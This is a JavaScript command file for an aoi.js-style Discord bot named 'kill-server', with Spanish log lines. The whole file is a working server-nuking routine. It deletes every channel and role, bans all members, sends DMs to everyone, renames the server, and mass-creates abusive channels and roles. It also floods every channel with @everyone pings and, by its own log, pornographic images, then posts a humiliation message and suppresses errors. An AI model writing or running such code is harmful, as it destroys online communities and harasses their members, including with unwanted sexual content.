module.exports = ({
name: "kill-server",
code: `
$log[✅  He terminado de joder el servidor "$serverName"]
$channelSendMessage[$randomChannelID;✅ He terminado de joder el servidor :)]
$log[🕖  Mandando un mensaje de humillación en un canal aleatorio...]

$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]
$createRole[FUCKED <3;cb3234]

$log[🕖  Creando 100 roles en el servidor "$serverName"...]

$textSplitMap[del-roles]
$textSplit[$guildRoles[id];, ]

$log[🕖  Eliminando todos los roles...]

$forEachMember[dm-users-kill]

$setGuildName[FUCKED <3]

$log[🕖  Cambiando el nombre del servidor a "FUCKED <3"...]
$forEachMember[ban-users]

$log[🕖  Baneando a todos los usuarios en "$serverName"...]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]
$forEachGuildChannel[flood-message-kill]

$log[🕖  Spameando todos canales con @everyone e imagenes porno en "$serverName"...]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]
$createChannel[FUCKED with love;text;no]

$log[🕖  Creando muchos canales en "$serverName"...]
$forEachGuildChannel[del-channels]
$log[🕖  Eliminando canales en "$serverName"...]
$sendMessage[🕖 Iniciando...;no]

$suppressErrors
`
})
